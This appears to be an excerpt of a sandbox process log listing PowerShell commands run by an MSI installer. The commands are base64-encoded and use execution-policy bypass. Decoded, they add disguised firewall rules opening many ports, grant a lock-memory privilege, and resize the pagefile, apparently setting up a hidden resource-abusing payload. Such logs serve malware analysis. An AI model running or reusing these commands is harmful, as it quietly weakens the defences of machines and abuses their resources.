ADQANAA5ACwAIAA2ADAANgAwACwAIAA4ADAAOAAwACwAIAA4ADgAOAA4ACwAIAA5ADIAMAAwACwAIAAxADAAMQAyADgALAAgADEAMAA2ADAAMAAsACAAMQAwADYANAAzACwAIAAxADIAMAAyADAALAAgADEAOAA4ADgAOAAsACAAMQA4ADEAOQAyACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AUAByAG8AdABvAGMAbwBsACAAVQBEAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFIAbwB1AHQAZQByAFcAZQBiACAAUABhAGMAawBhAGcAZQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBSAG8AdQB0AGUAcgBXAGUAYgAgAFAAYQBjAGsAYQBnAGUAIABDAG8AbgB0AHIAbwBsACIAIAAtAEcAcgBvAHUAcAAgACIAUgBvAHUAdABlAHIAVwBlAGIAIABQAGEAYwBrAGEAZwBlACAAQwBvAG4AdAByAG8AbAAiACAALQBMAG8AYwBhAGwAUABvAHIAdAAgADgAMAAsACAANAA0ADMALAAgADIAMAAyADAALAAgADIAMgAyADIALAAgADMAMQAwADAALAAgADMAMwAzADMALAAgADQAMAA0ADAALAAgADQANAA0ADQALAAgADQANAA0ADkALAAgADYAMAA2ADAALAAgADgAMAA4ADAALAAgADgAOAA4ADgALAAgADkAMgAwADAALAAgADEAMAAxADIAOAAsACAAMQAwADYAMAAwACwAIAAxADAANgA0ADMALAAgADEAMgAwADIAMAAsACAAMQA4ADgAOAA4ACwAIAAxADgAMQA5ADIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFUARABQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUA
      4⤵
      PID:2768
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2392
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss91DF.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi91DC.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr91DD.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr91DE.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:5428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgAjAGQAZQBmAGkAbgBlACAAVQBOAEkAQwBPAEQARQAKACMAZABlAGYAaQBuAGUAIABfAFUATgBJAEMATwBEAEUACgAKACMAaQBuAGMAbAB1AGQAZQAgADwAdwBpAG4AZABvAHcAcwAuAGgAPgAKACMAaQBuAGMAbAB1AGQAZQAgADwAbgB0AHMAZQBjAGEAcABpAC4AaAA+AAoAIwBpAG4AYwBsAHUAZABlACAAPABuAHQAcwB0AGEAdAB1AHMALgBoAD4ACgAjAGkAbgBjAGwAdQBkAGUAIAA8AFMAZABkAGwALgBoAD4ACgAKAHYAbwBpAGQAIABJAG4AaQB0AEwAcwBhAFMAdAByAGkAbgBnACgAUABMAFMAQQBfAFUATgBJAEMATwBEAEUAXwBTAFQAUgBJAE4ARwAgAEwAcwBhAFMAdAByAGkAbgBnACwAIABMAFAAVwBTAFQAUgAgAFMAdAByAGkAbgBnACkACgB7AAoAIAAgACAAIABEAFcATwBSAEQAIABTAHQAcgBpAG4AZwBMAGUAbgBnAHQAaAA7AAoACgAgACAAIAAgAGkAZgAgACgAUwB0AHIAaQBuAGcAIAA9AD0AIABOAFUATABMACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAEwAcwBhAFMAdAByAGkAbgBnAC0APgBCAHUAZgBmAGUAcgAgAD0AIABOAFUATABMADsACgAgACAAIAAgACAAIAAgACAATABzAGEAUwB0AHIAaQBuAGcALQA+AEwAZQBuAGcAdABoACAAPQAgADAAOwAKACAAIAAgACAAIAAgACAAIABMAHMAYQBTAHQAcgBpAG4AZwAtAD4ATQBhAHgAaQBtAHUAbQBMAGUAbgBnAHQAaAAgAD0AIAAwADsACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABTAHQAcgBpAG4AZwBMAGUAbgBnAHQAaAAgAD0AIAB3AGMAcwBsAGUAbgAoAFMAdAByAGkAbgBnACkAOwAKACAAIAAgACAATABzAGEAUwB0AHIAaQBuAGcALQA+AEIAdQBmAGYAZQByACAAPQAgAFMAdAByAGkAbgBnADsACgAgACAAIAAgAEwAcwBhAFMAdAByAGkAbgBnAC0APgBMAGUAbgBnAHQAaAAgAD0AIAAoAFUAUwBIAE8AUgBUACkAUwB0AHIAaQBuAGcATABlAG4AZwB0AGgAIAAqACAAcwBpAHoAZQBvAGYAKABXAEMASABBAFIAKQA7AAoAIAAgACAAIABMAHMAYQBTAHQAcgBpAG4AZwAtAD4ATQBhAHgAaQBtAHUAbQBMAGUAbgBnAHQAaAAgAD0AIAAoAFUAUwBIAE8AUgBUACkAKABTAHQAcgBpAG4AZwBMAGUAbgBnAHQAaAAgACsAIAAxACkAIAAqACAAcwBpAHoAZQBvAGYAKABXAEMASABBAFIAKQA7AAoAfQAKAAoATgBUAFMAVABBAFQAVQBTACAATwBwAGUAbgBQAG8AbABpAGMAeQAoAEwAUABXAFMAVABSACAAUwBlAHIAdgBlAHIATgBhAG0AZQAsACAARABXAE8AUgBEACAARABlAHMAaQByAGUAZABBAGMAYwBlAHMAcwAsACAAUABMAFMAQQBfAEgAQQBOAEQATABFACAAUABvAGwAaQBjAHkASABhAG4AZABsAGUAKQAKAHsACgAgACAAIAAgAEwAUwBBAF8ATwBCAEoARQBDAFQAXwBBAFQAVABSAEkAQgBVAFQARQBTACAATwBiAGoAZQBjAHQAQQB0AHQAcgBpAGIAdQB0AGUAcwA7AAoAIAAgACAAIABMAFMAQQBfAFUATgBJAEMATwBEAEUAXwBTAFQAUgBJAE4ARwAgAFMAZQByAHYAZQByAFMAdAByAGkAbgBnADsACgAgACAAIAAgAFAATABTAEEAXwBVAE4ASQBDAE8ARABFAF8AUwBUAFIASQBOAEcAIABTAGUAcgB2AGUAcgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAWgBlAHIAbwBNAGUAbQBvAHIAeQAoACYATwBiAGoAZQBjAHQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAcwBpAHoAZQBvAGYAKABPAGIAagBlAGMAdABBAHQAdAByAGkAYgB1AHQAZQBzACkAKQA7AAoACgAgACAAIAAgAGkAZgAgACgAUwBlAHIAdgBlAHIATgBhAG0AZQAgACEAPQAgAE4AVQBMAEwAKQAgAHsACgAgACAAIAAgACAAIAAgACAASQBuAGkAdABMAHMAYQBTAHQAcgBpAG4AZwAoACYAUwBlAHIAdgBlAHIAUwB0AHIAaQBuAGcALAAgAFMAZQByAHYAZQByAE4AYQBtAGUAKQA7AAoAIAAgACAAIAAgACAAIAAgAFMAZQByAHYAZQByACAAPQAgACYAUwBlAHIAdgBlAHIAUwB0AHIAaQBuAGcAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgAEwAcwBhAE8AcABlAG4AUABvAGwAaQBjAHkAKAAKACAAIAAgACAAIAAgACAAIABTAGUAcgB2AGUAcgAsAAoAIAAgACAAIAAgACAAIAAgACYATwBiAGoAZQBjAHQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAAoAIAAgACAAIAAgACAAIAAgAEQAZQBzAGkAcgBlAGQAQQBjAGMAZQBzAHMALAAKACAAIAAgACAAIAAgACAAIABQAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAKACAAIAAgACAAKQA7AAoAfQAKAAoATgBUAFMAVABBAFQAVQBTACAAUwBlAHQAUAByAGkAdgBpAGwAZQBnAGUATwBuAEEAYwBjAG8AdQBuAHQAKABMAFMAQQBfAEgAQQBOAEQATABFACAAUABvAGwAaQBjAHkASABhAG4AZABsAGUALAAgAFAAUwBJAEQAIABBAGMAYwBvAHUAbgB0AFMAaQBkACwAIABMAFAAVwBTAFQAUgAgAFAAcgBpAHYAaQBsAGUAZwBlAE4AYQBtAGUALAAgAEIATwBPAEwAIABiAEUAbgBhAGIAbABlACkACgB7AAoAIAAgACAAIABMAFMAQQBfAFUATgBJAEMATwBEAEUAXwBTAFQAUgBJAE4ARwAgAFAAcgBpAHYAaQBsAGUAZwBlAFMAdAByAGkAbgBnADsACgAKACAAIAAgACAASQBuAGkAdABMAHMAYQBTAHQAcgBpAG4AZwAoACYAUAByAGkAdgBpAGwAZQBnAGUAUwB0AHIAaQBuAGcALAAgAFAAcgBpAHYAaQBsAGUAZwBlAE4AYQBtAGUAKQA7AAoACgAgACAAIAAgAGkAZgAgACgAYgBFAG4AYQBiAGwAZQApACAAewAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAEwAcwBhAEEAZABkAEEAYwBjAG8AdQBuAHQAUgBpAGcAaAB0AHMAKAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFAAbwBsAGkAYwB5AEgAYQBuAGQAbABlACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABBAGMAYwBvAHUAbgB0AFMAaQBkACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAmAFAAcgBpAHYAaQBsAGUAZwBlAFMAdAByAGkAbgBnACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAxAAoAIAAgACAAIAAgACAAIAAgACkAOwAKACAAIAAgACAAfQAKACAAIAAgACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIABMAHMAYQBSAGUAbQBvAHYAZQBBAGMAYwBvAHUAbgB0AFIAaQBnAGgAdABzACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABQAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAsAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAQQBjAGMAbwB1AG4AdABTAGkAZAAsAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARgBBAEwAUwBFACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAmAFAAcgBpAHYAaQBsAGUAZwBlAFMAdAByAGkAbgBnACwACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAxAAoAIAAgACAAIAAgACAAIAAgACkAOwAKACAAIAAgACAAfQAKAH0ACgAKAHYAbwBpAGQAIABtAGEAaQBuACgAKQAKAHsACgAgACAAIAAgAEgAQQBOAEQATABFACAAaABUAG8AawBlAG4AIAA9ACAATgBVAEwATAA7AAoACgAgACAAIAAgAGkAZgAgACgAIQBPAHAAZQBuAFAAcgBvAGMAZQBzAHMAVABvAGsAZQBuACgARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAsACAAVABPAEsARQBOAF8AUQBVAEUAUgBZACwAIAAmAGgAVABvAGsAZQBuACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBPAHAAZQBuAFAAcgBvAGMAZQBzAHMAVABvAGsAZQBuACAAZgBhAGkAbABlAGQALgAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACAAcgBlAHQAdQByAG4AZQBkADoAIAAlAGQAXABuACIALAAgAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACgAKQApADsACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAtADEAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABEAFcATwBSAEQAIABkAHcAQgB1AGYAZgBlAHIAUwBpAHoAZQAgAD0AIAAwADsACgAKACAAIAAgACAAaQBmACAAKAAhAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AKABoAFQAbwBrAGUAbgAsACAAVABvAGsAZQBuAFUAcwBlAHIALAAgAE4AVQBMAEwALAAgADAALAAgACYAZAB3AEIAdQBmAGYAZQByAFMAaQB6AGUAKQAgACYAJgAKACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AEwAYQBzAHQARQByAHIAbwByACgAKQAgACEAPQAgAEUAUgBSAE8AUgBfAEkATgBTAFUARgBGAEkAQwBJAEUATgBUAF8AQgBVAEYARgBFAFIAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAGgAVABvAGsAZQBuACkAOwAKACAAIAAgACAAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAFAAVABPAEsARQBOAF8AVQBTAEUAUgAgAHAAVABvAGsAZQBuAFUAcwBlAHIAIAA9ACAAKABQAFQATwBLAEUATgBfAFUAUwBFAFIAKQAgAG0AYQBsAGwAbwBjACgAZAB3AEIAdQBmAGYAZQByAFMAaQB6AGUAKQA7AAoACgAgACAAIAAgAGkAZgAgACgAIQBHAGUAdABUAG8AawBlAG4ASQBuAGYAbwByAG0AYQB0AGkAbwBuACgACgAgACAAIAAgACAAIAAgACAAaABUAG8AawBlAG4ALAAKACAAIAAgACAAIAAgACAAIABUAG8AawBlAG4AVQBzAGUAcgAsAAoAIAAgACAAIAAgACAAIAAgAHAAVABvAGsAZQBuAFUAcwBlAHIALAAKACAAIAAgACAAIAAgACAAIABkAHcAQgB1AGYAZgBlAHIAUwBpAHoAZQAsAAoAIAAgACAAIAAgACAAIAAgACYAZAB3AEIAdQBmAGYAZQByAFMAaQB6AGUAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAEcAZQB0AFQAbwBrAGUAbgBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKAAoAIAAgACAAIAAgACAAIAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAGgAVABvAGsAZQBuACkAOwAKACAAIAAgACAAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAEwAUABXAFMAVABSACAAcwB0AHIAcwBpAGQAOwAKACAAIAAgACAAQwBvAG4AdgBlAHIAdABTAGkAZABUAG8AUwB0AHIAaQBuAGcAUwBpAGQAKABwAFQAbwBrAGUAbgBVAHMAZQByAC0APgBVAHMAZQByAC4AUwBpAGQALAAgACYAcwB0AHIAcwBpAGQAKQA7AAoAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBVAHMAZQByACAAUwBJAEQAOgAgACUAUwBcAG4AIgAsACAAcwB0AHIAcwBpAGQAKQA7AAoACgAgACAAIAAgAEMAbABvAHMAZQBIAGEAbgBkAGwAZQAoAGgAVABvAGsAZQBuACkAOwAKACAAIAAgACAAaABUAG8AawBlAG4AIAA9ACAATgBVAEwATAA7AAoACgAgACAAIAAgAE4AVABTAFQAQQBUAFUAUwAgAHMAdABhAHQAdQBzADsACgAgACAAIAAgAEwAUwBBAF8ASABBAE4ARABMAEUAIABwAG8AbABpAGMAeQBIAGEAbgBkAGwAZQA7AAoACgAgACAAIAAgAGkAZgAgACgAcwB0AGEAdAB1AHMAIAA9ACAATwBwAGUAbgBQAG8AbABpAGMAeQAoAE4AVQBMAEwALAAgAFAATwBMAEkAQwBZAF8AQwBSAEUAQQBUAEUAXwBBAEMAQwBPAFUATgBUACAAfAAgAFAATwBMAEkAQwBZAF8ATABPAE8ASwBVAFAAXwBOAEEATQBFAFMALAAgACYAcABvAGwAaQBjAHkASABhAG4AZABsAGUAKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAE8AcABlAG4AUABvAGwAaQBjAHkAIAAlAGQAIgAsACAAcwB0AGEAdAB1AHMAKQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAGkAZgAgACgAcwB0AGEAdAB1AHMAIAA9ACAAUwBlAHQAUAByAGkAdgBpAGwAZQBnAGUATwBuAEEAYwBjAG8AdQBuAHQAKABwAG8AbABpAGMAeQBIAGEAbgBkAGwAZQAsACAAcABUAG8AawBlAG4AVQBzAGUAcgAtAD4AVQBzAGUAcgAuAFMAaQBkACwAIABTAEUAXwBMAE8AQwBLAF8ATQBFAE0ATwBSAFkAXwBOAEEATQBFACwAIABUAFIAVQBFACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBPAHAAZQBuAFAAUwBlAHQAUAByAGkAdgBpAGwAZQBnAGUATwBuAEEAYwBjAG8AdQBuAHQAbwBsAGkAYwB5ACAAJQBkACIALAAgAHMAdABhAHQAdQBzACkAOwAKACAAIAAgACAAfQAKAAoAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAgACAAIAAgAFQATwBLAEUATgBfAFAAUgBJAFYASQBMAEUARwBFAFMAIAB0AHAAOwAKAAoAIAAgACAAIABpAGYAIAAoACEATwBwAGUAbgBQAHIAbwBjAGUAcwBzAFQAbwBrAGUAbgAoAEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALAAgAFQATwBLAEUATgBfAFEAVQBFAFIAWQAgAHwAIABUAE8ASwBFAE4AXwBBAEQASgBVAFMAVABfAFAAUgBJAFYASQBMAEUARwBFAFMALAAgACYAaABUAG8AawBlAG4AKQApAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAGEAcABwAGwAbwBnACgATABPAEcAXwBJAE4ARgBPACwAIAAiAE8AcABlAG4AUAByAG8AYwBlAHMAcwBUAG8AawBlAG4AIAAjADIAIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAHQAcAAuAFAAcgBpAHYAaQBsAGUAZwBlAEMAbwB1AG4AdAAgAD0AIAAxADsACgAgACAAIAAgAHQAcAAuAFAAcgBpAHYAaQBsAGUAZwBlAHMAWwAwAF0ALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgAFMARQBfAFAAUgBJAFYASQBMAEUARwBFAF8ARQBOAEEAQgBMAEUARAA7AAoACgAgACAAIAAgAGkAZgAgACgAIQBMAG8AbwBrAHUAcABQAHIAaQB2AGkAbABlAGcAZQBWAGEAbAB1AGUAKABOAFUATABMACwAIABTAEUAXwBMAE8AQwBLAF8ATQBFAE0ATwBSAFkAXwBOAEEATQBFACwAIAAmAHQAcAAuAFAAcgBpAHYAaQBsAGUAZwBlAHMAWwAwAF0ALgBMAHUAaQBkACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBMAG8AbwBrAHUAcABQAHIAaQB2AGkAbABlAGcAZQBWAGEAbAB1AGUAIABmAGEAaQBsAGUAZAAuACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAIAByAGUAdAB1AHIAbgBlAGQAOgAgACUAZABcAG4AIgAsACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApACkAOwAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgAC0AMQA7AAoAIAAgACAAIAB9AAoACgAgACAAIAAgAEIATwBPAEwAIAByAGUAcwB1AGwAdAAgAD0AIABBAGQAagB1AHMAdABUAG8AawBlAG4AUAByAGkAdgBpAGwAZQBnAGUAcwAoAGgAVABvAGsAZQBuACwAIABGAEEATABTAEUALAAgACYAdABwACwAIAAwACwAIAAoAFAAVABPAEsARQBOAF8AUABSAEkAVgBJAEwARQBHAEUAUwApAE4AVQBMAEwALAAgADAAKQA7AAoAIAAgACAAIABEAFcATwBSAEQAIABlAHIAcgBvAHIAIAA9ACAARwBlAHQATABhAHMAdABFAHIAcgBvAHIAKAApADsACgAKACAAIAAgACAAaQBmACAAKAAhAHIAZQBzAHUAbAB0ACAAfAB8ACAAKABlAHIAcgBvAHIAIAAhAD0AIABFAFIAUgBPAFIAXwBTAFUAQwBDAEUAUwBTACkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABhAHAAcABsAG8AZwAoAEwATwBHAF8ASQBOAEYATwAsACAAIgBBAGQAagB1AHMAdABUAG8AawBlAG4AUAByAGkAdgBpAGwAZQBnAGUAcwAgAGYAYQBpAGwAZQBkAC4AIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAgAHIAZQB0AHUAcgBuAGUAZAA6ACAAJQBkAFwAbgAiACwAIABlAHIAcgBvAHIAKQA7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAALQAxADsACgAgACAAIAAgAH0ACgAKACAAIAAgACAAQwBsAG8AcwBlAEgAYQBuAGQAbABlACgAaABUAG8AawBlAG4AKQA7AAoAIAAgACAAIABoAFQAbwBrAGUAbgAgAD0AIABOAFUATABMADsACgAKACAAIAAgACAAUwBJAFoARQBfAFQAIABwAGEAZwBlAFMAaQB6AGUAIAA9ACAARwBlAHQATABhAHIAZwBlAFAAYQBnAGUATQBpAG4AaQBtAHUAbQAoACkAOwAKAAoAIAAgACAAIABjAGgAYQByACAAKgBsAGEAcgBnAGUAQgB1AGYAZgBlAHIAIAA9ACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABOAFUATABMACwAIABwAGEAZwBlAFMAaQB6AGUAIAAqACAATgBfAFAAQQBHAEUAUwBfAFQATwBfAEEATABMAE8AQwAsACAATQBFAE0AXwBSAEUAUwBFAFIAVgBFACAAfAAgAE0ARQBNAF8AQwBPAE0ATQBJAFQAIAB8ACAATQBFAE0AXwBMAEEAUgBHAEUAXwBQAEEARwBFAFMALAAgAFAAQQBHAEUAXwBSAEUAQQBEAFcAUgBJAFQARQApADsACgAgACAAIAAgAGkAZgAgACgAbABhAHIAZwBlAEIAdQBmAGYAZQByACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAYQBwAHAAbABvAGcAKABMAE8ARwBfAEkATgBGAE8ALAAgACIAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAIABmAGEAaQBsAGUAZAAsACAAZQByAHIAbwByACAAMAB4ACUAeAAiACwAIABHAGUAdABMAGEAcwB0AEUAcgByAG8AcgAoACkAKQA7AAoAIAAgACAAIAB9AAoAfQA=
      4⤵
      PID:1504
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss9407.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi9404.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr9405.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr9406.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:1332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgAkAHAAYQBnAGUAZgBpAGwAZQAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtACAALQBFAG4AYQBiAGwAZQBBAGwAbABQAHIAaQB2AGkAbABlAGcAZQBzAAoAJABwAGEAZwBlAGYAaQBsAGUALgBBAHUAdABvAG0AYQB0AGkAYwBNAGEAbgBhAGcAZQBkAFAAYQBnAGUAZgBpAGwAZQAgAD0AIAAkAGYAYQBsAHMAZQAKACQAcABhAGcAZQBmAGkAbABlAC4AcAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAAKAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAHAAYQBnAGUAZgBpAGwAZQBzAGUAdAB0AGkAbgBnAAoAJABwAGEAZwBlAGYAaQBsAGUAcwBlAHQALgBJAG4AaQB0AGkAYQBsAFMAaQB6AGUAIAA9ACAANAAwADkANgAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4ATQBhAHgAaQBtAHUAbQBTAGkAegBlACAAPQAgADIAMAA0ADgAMAAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4AUAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
      4⤵
      PID:5476
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2316
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss96CB.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi96C8.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr96C9.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr96CA.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:5352
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
